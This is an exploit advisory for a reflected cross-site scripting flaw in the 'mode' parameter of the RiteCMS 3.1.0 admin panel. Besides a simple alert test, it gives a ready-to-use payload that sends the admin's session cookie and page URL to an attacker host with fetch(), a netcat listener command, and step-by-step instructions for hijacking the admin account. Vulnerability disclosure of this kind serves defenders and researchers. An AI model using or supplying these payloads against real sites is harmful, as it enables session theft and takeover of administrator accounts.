## Exploit Title: RiteCMS 3.1.0 - Reflected XSS in Admin Panel
## Date: October 28, 2025
## Exploit Author: Chokri Hammedi
## Vendor Homepage: https://ritecms.com/
## Software Link: https://github.com/ritecms/ritecms
## Version: RiteCMS 3.1.0
## Tested on: windows xp
## Vulnerability Description:
Reflected Cross-Site Scripting (XSS) vulnerability in the `mode` parameter
of the admin panel allows attackers to steal admin session cookies and
compromise the admin account.
## Proof of Concept:
### Alert Proof of Concept:
```http
http://ritecms.local/admin.php?mode=');alert('XSS');//
```
### Cookie Stealing Payload:
```http
http://ritecms.local/admin.php?mode=');fetch('http://192.168.1.103:8082/steal
',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:window.location.href})});//
```
## Attack Scenario:
1. Attacker sets up listener: `nc -lvnp 8082`
2. Attacker sends malicious link to admin
3. Admin clicks link, session cookie is sent to attacker
4. Attacker uses stolen session to gain admin access